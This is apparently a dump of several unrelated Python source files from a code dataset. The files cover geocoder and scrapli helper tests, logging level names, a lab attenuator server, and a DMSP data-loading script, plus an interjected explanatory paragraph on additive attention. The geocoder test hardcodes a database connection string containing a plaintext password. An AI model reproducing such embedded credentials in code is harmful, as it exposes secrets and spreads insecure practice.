state\n\n\nclass DecoderInput(typing.NamedTuple):\n new_tokens: Any\n enc_output: Any\n mask: Any\n\nclass DecoderOutput(typing.NamedTuple):\n logits: Any\n attention_weights: Any\n\n","sub_path":"src/interpreter/attention_auto_encoder/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
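The BahdanauAttention layer above follows the additive-attention equation its own comments call Eqn. (4): query and value are projected by W1 and W2 and scored as score(h_t, h_s) = v_a . tanh(W1@h_t + W2@h_s), with the learned vector v_a living inside Keras' AdditiveAttention layer. A toy numpy sketch of that scoring rule on already-projected vectors:

import numpy as np

def additive_score(w1_query, w2_key, v_a):
    """score = v_a . tanh(W1@ht + W2@hs), on pre-projected vectors."""
    return float(np.dot(v_a, np.tanh(w1_query + w2_key)))

rng = np.random.default_rng(0)
q, k, v_a = rng.normal(size=(3, 8))  # toy vectors with attention width 8
print(additive_score(q, k, v_a))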
+{"seq_id":"115093817","text":"import unittest\nfrom cataloger import reverse_geocode_wgs84_boundingbox\n\n\nclass TestGeocoder(unittest.TestCase):\n \"\"\"\n unittests for the geocoder function\n \"\"\"\n def setUp(self):\n self.pg_conn_str = \"postgres://james:MopMetal3@localhost:5432/mapcatalogue\"\n self.us_bbox = (-74.66163264559283, 39.650417182507944, -72.0006154054558, 41.612140592278074)\n\n def test_geocoder_returns_list(self):\n self.assertIsInstance(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, self.us_bbox),\n list,\n 'Should be a list'\n )\n\n def test_geocoder_contains_dict(self):\n self.assertIsInstance(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, self.us_bbox)[0],\n dict,\n 'List should contain dictionaries'\n )\n\n def test_geocoder_equals(self):\n bboxes = {\n 1: [\n (-84.7, 28.5, -66.8, 42.6),\n [{'country': 'Canada', 'continent': 'North America'},\n {'country': 'United States', 'continent': 'North America'}]\n ],\n 2: [\n (-4.080, 55.572, -2.228, 57.250),\n [{'country': 'England', 'continent': 'Europe'},\n {'country': 'Scotland', 'continent': 'Europe'}]\n ],\n }\n\n for bb in bboxes:\n bbox_coords = bboxes[bb][0]\n geographies = bboxes[bb][1]\n\n self.assertEqual(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, bboxes[bb][0]),\n bboxes[bb][1],\n 'Geographies for BBox should equal: {0}'.format(bboxes[bb][1])\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"546862590","text":"import importlib\nimport os\nimport re\nimport sys\nfrom io import TextIOWrapper\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport pkg_resources # pylint: disable=C041\nimport pytest\n\nimport scrapli\nfrom scrapli.exceptions import TransportPluginError\nfrom scrapli.helper import (\n _find_transport_plugin,\n _textfsm_get_template,\n attach_duplicate_log_filter,\n genie_parse,\n get_prompt_pattern,\n resolve_file,\n strip_ansi,\n textfsm_parse,\n ttp_parse,\n)\n\nTEST_DATA_DIR = f\"{Path(scrapli.__file__).parents[1]}/tests/test_data\"\n\nIOS_ARP = \"\"\"Protocol Address Age (min) Hardware Addr Type Interface\nInternet 172.31.254.1 - 0000.0c07.acfe ARPA Vlan254\nInternet 172.31.254.2 - c800.84b2.e9c2 ARPA Vlan254\n\"\"\"\n\n\ndef test_get_prompt_pattern_class_pattern():\n class_pattern = \"^averygoodpattern$\"\n result = get_prompt_pattern(\"\", class_pattern)\n assert result == re.compile(b\"^averygoodpattern$\", re.IGNORECASE | re.MULTILINE)\n\n\ndef test_get_prompt_pattern_class_pattern_no_line_start_end_markers():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(class_pattern, \"\")\n assert result == re.compile(b\"averygoodpattern\")\n\n\ndef test_get_prompt_pattern_arg_pattern():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(\"^awesomepattern$\", class_pattern)\n assert result == re.compile(b\"^awesomepattern$\", re.IGNORECASE | re.MULTILINE)\n\n\ndef test_get_prompt_pattern_arg_string():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(\"awesomepattern\", class_pattern)\n assert result == re.compile(b\"awesomepattern\")\n\n\ndef test_get_prompt_pattern_arg_bytes():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(b\"awesomepattern\", class_pattern)\n assert result == re.compile(b\"awesomepattern\")\n\n\ndef test__strip_ansi():\n output = b\"[admin@CoolDevice.Sea1: \\x1b[1m/\\x1b[0;0m]$\"\n output = strip_ansi(output)\n assert output == b\"[admin@CoolDevice.Sea1: /]$\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test__textfsm_get_template_valid_template():\n template = _textfsm_get_template(\"cisco_nxos\", \"show ip arp\")\n template_dir = pkg_resources.resource_filename(\"ntc_templates\", \"templates\")\n assert isinstance(template, TextIOWrapper)\n assert template.name == f\"{template_dir}/cisco_nxos_show_ip_arp.textfsm\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test__textfsm_get_template_invalid_template():\n template = _textfsm_get_template(\"cisco_nxos\", \"show racecar\")\n assert not template\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\n@pytest.mark.parametrize(\n \"parse_type\",\n [\n (\n False,\n [\"Internet\", \"172.31.254.1\", \"-\", \"0000.0c07.acfe\", \"ARPA\", \"Vlan254\"],\n ),\n (\n True,\n {\n \"protocol\": \"Internet\",\n \"address\": \"172.31.254.1\",\n \"age\": \"-\",\n \"mac\": \"0000.0c07.acfe\",\n \"type\": \"ARPA\",\n \"interface\": \"Vlan254\",\n },\n ),\n ],\n ids=[\"to_dict_false\", \"to_dict_true\"],\n)\ndef test_textfsm_parse_success(parse_type):\n to_dict = parse_type[0]\n expected_result = parse_type[1]\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template, IOS_ARP, to_dict=to_dict)\n assert isinstance(result, list)\n assert result[0] == 
expected_result\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\n@pytest.mark.parametrize(\n \"parse_type\",\n [\n (\n False,\n [\"Internet\", \"172.31.254.1\", \"-\", \"0000.0c07.acfe\", \"ARPA\", \"Vlan254\"],\n ),\n (\n True,\n {\n \"protocol\": \"Internet\",\n \"address\": \"172.31.254.1\",\n \"age\": \"-\",\n \"mac\": \"0000.0c07.acfe\",\n \"type\": \"ARPA\",\n \"interface\": \"Vlan254\",\n },\n ),\n ],\n ids=[\"to_dict_false\", \"to_dict_true\"],\n)\ndef test_textfsm_parse_success_string_path(parse_type):\n to_dict = parse_type[0]\n expected_result = parse_type[1]\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template.name, IOS_ARP, to_dict=to_dict)\n assert isinstance(result, list)\n assert result[0] == expected_result\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test_textfsm_parse_failure():\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template, \"not really arp data\")\n assert result == []\n\n\n@pytest.mark.skipif(\n sys.version_info.minor > 8, reason=\"genie not currently available for python 3.9\"\n)\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting genie on windows\")\ndef test_genie_parse_success():\n result = genie_parse(\"iosxe\", \"show ip arp\", IOS_ARP)\n assert isinstance(result, dict)\n assert (\n result[\"interfaces\"][\"Vlan254\"][\"ipv4\"][\"neighbors\"][\"172.31.254.1\"][\"ip\"] == \"172.31.254.1\"\n )\n\n\n@pytest.mark.skipif(\n sys.version_info.minor > 8, reason=\"genie not currently available for python 3.9\"\n)\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting genie on windows\")\ndef test_genie_parse_failure():\n result = genie_parse(\"iosxe\", \"show ip arp\", \"not really arp data\")\n assert result == []\n # w/out killing this module pyfakefs explodes. 
dont remember why/how i found that out...\n del sys.modules[\"pyats.configuration\"]\n\n\ndef test_ttp_parse():\n # example data lifted straight out of ttp docs\n data_to_parse = \"\"\"\n interface Loopback0\n description Router-id-loopback\n ip address 192.168.0.113/24\n !\n interface Vlan778\n description CPE_Acces_Vlan\n ip address 2002::fd37/124\n ip vrf CPE1\n !\n \"\"\"\n\n ttp_template = \"\"\"\n interface {{ interface }}\n ip address {{ ip }}/{{ mask }}\n description {{ description }}\n ip vrf {{ vrf }}\n \"\"\"\n\n expected = [\n [\n {\n \"ip\": \"192.168.0.113\",\n \"mask\": \"24\",\n \"description\": \"Router-id-loopback\",\n \"interface\": \"Loopback0\",\n },\n {\n \"vrf\": \"CPE1\",\n \"ip\": \"2002::fd37\",\n \"mask\": \"124\",\n \"description\": \"CPE_Acces_Vlan\",\n \"interface\": \"Vlan778\",\n },\n ]\n ]\n result = ttp_parse(template=ttp_template, output=data_to_parse)\n assert result == expected\n\n\ndef test_ttp_parse_invalid_template():\n result = ttp_parse(template=None, output=\"blah\")\n assert result == []\n\n\ndef test_ttp_parse_failed_to_parse():\n result = ttp_parse(template=\"mytemplateisneat\", output=\"blah\")\n assert result == [{}]\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file():\n resolved_file = resolve_file(file=f\"{TEST_DATA_DIR}/files/_ssh_config\")\n assert resolved_file == f\"{TEST_DATA_DIR}/files/_ssh_config\"\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file_expanduser(fs):\n fs.add_real_file(\n source_path=f\"{TEST_DATA_DIR}/files/_ssh_config\",\n target_path=f\"{os.path.expanduser('~')}/myneatfile\",\n )\n resolved_file = resolve_file(file=f\"~/myneatfile\")\n assert resolved_file == f\"{os.path.expanduser('~')}/myneatfile\"\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file_failure():\n with pytest.raises(ValueError) as exc:\n resolve_file(file=f\"~/myneatfile\")\n assert str(exc.value) == \"File path `~/myneatfile` could not be resolved\"\n\n\ndef test_attach_duplicate_log_filter():\n dummy_logger = getLogger(\"this_is_a_dumb_test_log\")\n assert dummy_logger.filters == []\n attach_duplicate_log_filter(logger=dummy_logger)\n # simple assert to confirm that we got the dup filter attached to the new logger\n assert dummy_logger.filters[0].__class__.__name__ == \"DuplicateFilter\"\n\n\ndef test__find_transport_plugin_failure():\n with pytest.raises(ModuleNotFoundError) as exc:\n _find_transport_plugin(transport=\"blah\")\n assert (\n str(exc.value)\n == \"\\n***** Module 'scrapli_blah' not found! ************************************************\\nTo resolve this issue, ensure you are referencing a valid transport plugin. Transport plugins should be named similar to `scrapli_paramiko` or `scrapli_ssh2`, and can be selected by passing simply `paramiko` or `ssh2` into the scrapli driver. You can install most plugins with pip: `pip install scrapli-ssh2` for example.\\n***** Module 'scrapli_blah' not found! 
************************************************\"\n )\n\n\ndef test___find_transport_plugin_module_failed_to_load(monkeypatch):\n from scrapli_ssh2 import transport\n\n monkeypatch.setattr(transport, \"Transport\", None)\n with pytest.raises(TransportPluginError) as exc:\n _find_transport_plugin(transport=\"ssh2\")\n assert (\n str(exc.value)\n == \"Failed to load transport plugin `ssh2` transport class or required arguments\"\n )\n\n\ndef test_textfsm_get_template_no_textfsm(monkeypatch):\n def mock_import_module(name, package):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n _textfsm_get_template(platform=\"blah\", command=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-textfsm.txt'\\n2: 'pip install scrapli[textfsm]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n\n\ndef test_genie_parse_no_genie(monkeypatch):\n def mock_import_module(name, package):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n genie_parse(platform=\"blah\", command=\"blah\", output=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-genie.txt'\\n2: 'pip install scrapli[genie]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n\n\ndef test_ttp_parse_no_ttp(monkeypatch):\n def mock_import_module(name):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n ttp_parse(template=\"blah\", output=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-ttp.txt'\\n2: 'pip install scrapli[ttp]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n","sub_path":"tests/unit/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"503169630","text":"# encoding: utf-8\n\"\"\"\nDefine logging level names\n--------------------------\n\n.. rst-class:: html-toggle\n\nIdentification\n--------------\n\nCreated on Sep 28, 2014\n\nDefine names for the logging levels\n\n@author: Jonathan Gossage\n\n@copyright: © 2015 Jonathan Gossage. All rights reserved.\n\n@license: Apache 2\n\n@contact: jgossage at gmail.com\n@deffield updated: Updated\n\n\"\"\"\n\nimport logging\n\n# Define our symbolic names for the Python logging levels\nCRITICAL = 'critical'\n\"\"\"Our name for critical logging level\"\"\"\nERROR = 'error'\n\"\"\"Our name for error logging level\"\"\"\nWARNING = 'warning'\n\"\"\"Our name for warning logging level\"\"\"\nINFO = 'info'\n\"\"\"Our name for info logging level\"\"\"\nDEBUG = 'debug'\n\"\"\"Our name for debug logging level\"\"\"\n\nLLEVELS = {CRITICAL: logging.CRITICAL,\n ERROR: logging.ERROR,\n WARNING: logging.WARNING,\n INFO: logging.INFO,\n DEBUG: logging.DEBUG}\n\"\"\"\nMap from our symbolic names to the Python logging system levels\n\"\"\"\n\nRLEVELS = {logging.CRITICAL: CRITICAL,\n logging.ERROR: ERROR,\n logging.WARNING: WARNING,\n logging.INFO: INFO,\n logging.DEBUG: DEBUG}\n\"\"\"\nMap from the Python logging system log level codes to our symbolic names\n\"\"\"\n","sub_path":"Logging/src/logutils/loglevels.py","file_name":"loglevels.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"647599113","text":"# Copyright (C) 2007 Matthew Neeley, Isaac Storch\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = XY Attenuator Server\nversion = 1.0\ndescription = \n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 20\n### END NODE INFO\n\"\"\"\n\nfrom labrad.gpib import GPIBManagedServer\nfrom labrad.server import setting\nfrom labrad import types as T\nfrom twisted.internet.defer import inlineCallbacks, returnValue\nfrom numpy import floor\n\nclass XYAttenuatorServer(GPIBManagedServer):\n name = 'XY Attenuator Server'\n deviceName = 'Hewlett-Packard 11713A'\n deviceIdentFunc = 'identify_device'\n\n @inlineCallbacks\n def setAtten(self, c, val, commands):\n \"\"\"Helper method to set either the X or Y attenuation.\n\n This method looks up the desired attenuation and gpib\n command in the provided dictionary.\n \"\"\"\n dev = self.selectedDevice(c)\n if val not in commands.keys():\n raise Exception('Invalid attenuation value.')\n\n yield dev.write(commands[val])\n returnValue(T.Value(val, 'dB'))\n\n # settings\n\n @setting(1000, server='s', address='s', idn='s')\n def identify_device(self, c, server, address, idn=None):\n devices = [('ADR GPIB Bus', 'GPIB0::28'),\n ('DR GPIB Bus', 'GPIB0::28'),\n ('Twins IBCL GPIB Bus', 'ProbeStation GPIB-422CT::28'),\n ('T1000 IBCL GPIB Bus', 'T1000 GPIB-422CT::28')]\n if (server, address) in devices:\n return self.deviceName\n\n @setting(10000, \"X Atten\", data=['v[dB]'], returns=['v[dB]'])\n def x_atten(self, c, data):\n \"\"\"Set the X attenuation.\n\n Allowed values of are 0, 1, 2, ... 11 dB.\n \"\"\"\n val = int(data.value)\n return self.setAtten(c, val, XattnDict)\n\n @setting(10001, \"Y Atten\", data=['v[dB]'], returns=['v[dB]'])\n def y_atten(self, c, data):\n \"\"\"Set the Y attenuation.\n\n Allowed values are 0, 10, 20, ... 70 dB.\n \"\"\"\n val = int(data.value)\n return self.setAtten(c, val, YattnDict)\n\n @setting(10002, \"Total Atten\", data=['v[dB]'], returns=['v[dB]v[dB]'])\n def total_atten(self, c, data):\n \"\"\"Set the total attenuation on X and Y channels (connected in series).\n\n Allowed values of are 0, 1, 2, ... 
79 dB.\n Note: use x_atten and y_atten to go to 80 and 81 dB\n \"\"\"\n val = int(data.value)\n x = yield self.setAtten(c, val%10, XattnDict)\n y = yield self.setAtten(c, floor(val/10)*10, YattnDict)\n returnValue((x,y))\n\n# commands for X attenuation\nXattnDict = {\n 0: 'B1234',\n 1: 'A1B234',\n 2: 'A2B134',\n 3: 'A12B34',\n 4: 'A3B124',\n 5: 'A13B24',\n 6: 'A23B14',\n 7: 'A123B4',\n 8: 'A34B12',\n 9: 'A134B2',\n 10: 'A234B1',\n 11: 'A1234'\n}\n\n# commands for Y attenuation\nYattnDict = {\n 0: 'B5678',\n 10: 'A5B678',\n 20: 'A6B578',\n 30: 'A56B78',\n 40: 'A7B568',\n 50: 'A57B68',\n 60: 'A67B58',\n 70: 'A567B8'\n}\n\n__server__ = XYAttenuatorServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","sub_path":"xyattenuators.py","file_name":"xyattenuators.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"431622620","text":"from pandas import *\nfrom batch_fitting_class import *\nimport matplotlib.backends.backend_pdf\n\n\n####################################################################\n# start with different substrates\n####################################################################\n\n# read from excel into a pandas dataframe\nss = read_excel(\"DMSP_dosage.xlsx\", \"substrate_forpy\")\n\n# times\ndtimes = array(ss['T'])\n\n# convert to numpy arrays\na1 = array(ss['A_2090'])\na1D = array(ss['A_2090_DMSP'])\na1G = array(ss['A_2090_Glycerol'])\na1P = array(ss['A_2090_Proprionate'])\na1b = array(ss['A_2090_D7'])\na1bD = array(ss['A_2090_D7_DMSP'])\na1bG = array(ss['A_2090_D7_Glycerol'])\na1bP = array(ss['A_2090_D7_Proprionate'])\na2 = array(ss['A_379'])\na2D = array(ss['A_379_DMSP'])\na2G = array(ss['A_379_Glycerol'])\na2P = array(ss['A_379_Proprionate'])\na2b = array(ss['A_379_D7'])\na2bD = array(ss['A_379_D7_DMSP'])\na2bG = array(ss['A_379_D7_Glycerol'])\na2bP = array(ss['A_379_D7_Proprionate'])\nb1 = array(ss['B_2090'])\nb1D = array(ss['B_2090_DMSP'])\nb1G = array(ss['B_2090_Glycerol'])\nb1P = array(ss['B_2090_Proprionate'])\nb1a = array(ss['B_2090_D7'])\nb1aD = array(ss['B_2090_D7_DMSP'])\nb1aG = array(ss['B_2090_D7_Glycerol'])\nb1aP = array(ss['B_2090_D7_Proprionate'])\nb2 = array(ss['B_379'])\nb2D = array(ss['B_379_DMSP'])\nb2G = array(ss['B_379_Glycerol'])\nb2P = array(ss['B_379_Proprionate'])\nb2a = array(ss['B_379_D7'])\nb2aD = array(ss['B_379_D7_DMSP'])\nb2aG = array(ss['B_379_D7_Glycerol'])\nb2aP = array(ss['B_379_D7_Proprionate'])\n\na1sd = array(ss['A_2090_sd'])\na1Dsd = array(ss['A_2090_DMSP_sd'])\na1Gsd = array(ss['A_2090_Glycerol_sd'])\na1Psd = array(ss['A_2090_Proprionate_sd'])\na1bsd = array(ss['A_2090_D7_sd'])\na1bDsd = array(ss['A_2090_D7_DMSP_sd'])\na1bGsd = array(ss['A_2090_D7_Glycerol_sd'])\na1bPsd = array(ss['A_2090_D7_Proprionate_sd'])\na2sd = array(ss['A_379_sd'])\na2Dsd = array(ss['A_379_DMSP_sd'])\na2Gsd = array(ss['A_379_Glycerol_sd'])\na2Psd = array(ss['A_379_Proprionate_sd'])\na2bsd = array(ss['A_379_D7_sd'])\na2bDsd = array(ss['A_379_D7_DMSP_sd'])\na2bGsd = array(ss['A_379_D7_Glycerol_sd'])\na2bPsd = array(ss['A_379_D7_Proprionate_sd'])\nb1sd = array(ss['B_2090_sd'])\nb1Dsd = array(ss['B_2090_DMSP_sd'])\nb1Gsd = array(ss['B_2090_Glycerol_sd'])\nb1Psd = array(ss['B_2090_Proprionate_sd'])\nb1asd = array(ss['B_2090_D7_sd'])\nb1aDsd = array(ss['B_2090_D7_DMSP_sd'])\nb1aGsd = array(ss['B_2090_D7_Glycerol_sd'])\nb1aPsd = array(ss['B_2090_D7_Proprionate_sd'])\nb2sd = array(ss['B_379_sd'])\nb2Dsd = array(ss['B_379_DMSP_sd'])\nb2Gsd = array(ss['B_379_Glycerol_sd'])\nb2Psd = array(ss['B_379_Proprionate_sd'])\nb2asd = array(ss['B_379_D7_sd'])\nb2aDsd = array(ss['B_379_D7_DMSP_sd'])\nb2aGsd = array(ss['B_379_D7_Glycerol_sd'])\nb2aPsd = array(ss['B_379_D7_Proprionate_sd'])\n\n# put in dictionaries\ncont_a2090 = {'htimes': dtimes, 'hms': a1, 'hss': a1sd}\ncontD_a2090 = {'htimes': dtimes, 'hms': a1D, 'hss': a1Dsd}\ncontG_a2090 = {'htimes': dtimes, 'hms': a1G, 'hss': a1Gsd}\ncontP_a2090 = {'htimes': dtimes, 'hms': a1P, 'hss': a1Psd}\n\ncont_b2090 = {'htimes': dtimes, 'hms': b1, 'hss': b1sd}\ncontD_b2090 = {'htimes': dtimes, 'hms': b1D, 'hss': b1Dsd}\ncontG_b2090 = {'htimes': dtimes, 'hms': b1G, 'hss': b1Gsd}\ncontP_b2090 = {'htimes': dtimes, 'hms': b1P, 'hss': b1Psd}\n\ninf_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1b, 'vms': b1a, 'hss': a1bsd, 'vss': b1asd}\ninfD_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bD, 'vms': b1aD, 'hss': 
a1bDsd, 'vss': b1aDsd}\ninfG_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bG, 'vms': b1aG, 'hss': a1bGsd, 'vss': b1aGsd}\ninfP_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bP, 'vms': b1aP, 'hss': a1bPsd, 'vss': b1aPsd}\n\n# put in dictionaries\ncont_a379 = {'htimes': dtimes, 'hms': a2, 'hss': a2sd}\ncontD_a379 = {'htimes': dtimes, 'hms': a2D, 'hss': a2Dsd}\ncontG_a379 = {'htimes': dtimes, 'hms': a2G, 'hss': a2Gsd}\ncontP_a379 = {'htimes': dtimes, 'hms': a2P, 'hss': a2Psd}\n\ncont_b379 = {'htimes': dtimes, 'hms': b2, 'hss': b2sd}\ncontD_b379 = {'htimes': dtimes, 'hms': b2D, 'hss': b2Dsd}\ncontG_b379 = {'htimes': dtimes, 'hms': b2G, 'hss': b2Gsd}\ncontP_b379 = {'htimes': dtimes, 'hms': b2P, 'hss': b2Psd}\n\ninf_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2b, 'vms': b2a, 'hss': a2bsd, 'vss': b2asd}\ninfD_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bD, 'vms': b2aD, 'hss': a2bDsd, 'vss': b2aDsd}\ninfG_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bG, 'vms': b2aG, 'hss': a2bGsd, 'vss': b2aGsd}\ninfP_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bP, 'vms': b2aP, 'hss': a2bPsd, 'vss': b2aPsd}\n\n####################################################################\n# now do DMSP dosage\n####################################################################\n\n# read excel sheet into a pandas dataframe\nss = read_excel(\"DMSP_dosage.xlsx\", \"doses_forpy\")\n\n# times\ndtimes = array(ss['T'])\n\n# convert data from pandas data frame to arrays\na0 = array(ss['A_379_0'])\na10 = array(ss['A_379_10'])\na100 = array(ss['A_379_100'])\na500 = array(ss['A_379_500'])\nab0 = array(ss['A_379_D7_0'])\nab10 = array(ss['A_379_D7_10'])\nab100 = array(ss['A_379_D7_100'])\nab500 = array(ss['A_379_D7_500'])\nb0 = array(ss['B_379_0'])\nb10 = array(ss['B_379_10'])\nb100 = array(ss['B_379_100'])\nb500 = array(ss['B_379_500'])\nba0 = array(ss['B_379_D7_0'])\nba10 = array(ss['B_379_D7_10'])\nba100 = array(ss['B_379_D7_100'])\nba500 = array(ss['B_379_D7_500'])\n\na0sd = array(ss['A_379_0_sd'])\na10sd = array(ss['A_379_10_sd'])\na100sd = array(ss['A_379_100_sd'])\na500sd = array(ss['A_379_500_sd'])\nab0sd = array(ss['A_379_D7_0_sd'])\nab10sd = array(ss['A_379_D7_10_sd'])\nab100sd = array(ss['A_379_D7_100_sd'])\nab500sd = array(ss['A_379_D7_500_sd'])\nb0sd = array(ss['B_379_0_sd'])\nb10sd = array(ss['B_379_10_sd'])\nb100sd = array(ss['B_379_100_sd'])\nb500sd = array(ss['B_379_500_sd'])\nba0sd = array(ss['B_379_D7_0_sd'])\nba10sd = array(ss['B_379_D7_10_sd'])\nba100sd = array(ss['B_379_D7_100_sd'])\nba500sd = array(ss['B_379_D7_500_sd'])\n\n# put in dictionaries to call the function\ncont_a0 = {'htimes': dtimes, 'hms': a0, 'hss': a0sd}\ncont_a10 = {'htimes': dtimes, 'hms': a10, 'hss': a10sd}\ncont_a100 = {'htimes': dtimes, 'hms': a100, 'hss': a100sd}\ncont_a500 = {'htimes': dtimes, 'hms': a500, 'hss': a500sd}\n\ncont_b0 = {'htimes': dtimes, 'hms': b0, 'hss': b0sd}\ncont_b10 = {'htimes': dtimes, 'hms': b10, 'hss': b10sd}\ncont_b100 = {'htimes': dtimes, 'hms': b100, 'hss': b100sd}\ncont_b500 = {'htimes': dtimes, 'hms': b500, 'hss': b500sd}\n\ninf_0 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': ab0, 'vms': ba0, 'hss': ab0sd, 'vss': ba0sd}\ninf_10 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab10,\n 'vms': ba10, 'hss': ab10sd, 'vss': ba10sd}\ninf_100 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab100,\n 'vms': ba100, 'hss': ab100sd, 'vss': ba100sd}\ninf_500 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab500,\n 'vms': ba500, 'hss': ab500sd, 'vss': 
ba500sd}\n\n####################################################################\n# now do data from mixed experiments\n####################################################################\n\n# read excel sheet into a pandas dataframe\nsv = read_excel(\"DMSP_dosage.xlsx\", \"vir_forpy\")\nsb = read_excel(\"DMSP_dosage.xlsx\", \"bac_forpy\")\noh = read_excel(\"DMSP_dosage.xlsx\", \"onehost_forpy\")\nth = read_excel(\"DMSP_dosage.xlsx\", \"twohost_forpy\")\n\n# convert to numpy arrays\n# times\ndtimes = array(sv['T'])\n\n# algae\na2090 = array(sv['A_2090'])\na2090v = array(sv['A_2090_V'])\na2090b = array(sb['A_2090_D7'])\na2090vb = array(oh['A_2090_D7_V'])\na379 = array(sb['A_379'])\na379b = array(sb['A_379_D7'])\na379vb = array(oh['A_379_D7_V'])\na2090a379 = array(th['A_2090_A_379'])\na2090a379v = array(th['A_2090_A_379_V'])\na2090a379b = array(th['A_2090_A_379_D7'])\na2090a379vb = array(th['A_2090_A_379_D7_V'])\n\n# bacteria\nb2090b = array(sb['B_A_2090_D7'])\nb2090vb = array(oh['B_A_2090_D7_V'])\nb = array(sb['B'])\nb379b = array(sb['B_A_379_D7'])\nb379vb = array(oh['B_A_379_D7_V'])\nba2090a379b = array(th['B_A_2090_A_379_D7'])\nba2090a379vb = array(th['B_A_2090_A_379_D7_V'])\n\n# viruses\nv2090v = array(sv['V_A_2090_V'])\nv2090vb = array(oh['V_A_2090_D7_V'])\nv379vb = array(oh['V_A_379_D7_V'])\nva2090a379b = array(th['V_A_2090_A_379_D7'])\nva2090a379vb = array(th['V_A_2090_A_379_D7_V'])\n\n# algae\na2090sd = array(sv['A_2090_sd'])\na2090vsd = array(sv['A_2090_V_sd'])\na2090bsd = array(sb['A_2090_D7_sd'])\na2090vbsd = array(oh['A_2090_D7_V_sd'])\na379sd = array(sb['A_379_sd'])\na379bsd = array(sb['A_379_D7_sd'])\na379vbsd = array(oh['A_379_D7_V_sd'])\na2090a379sd = array(th['A_2090_A_379_sd'])\na2090a379vsd = 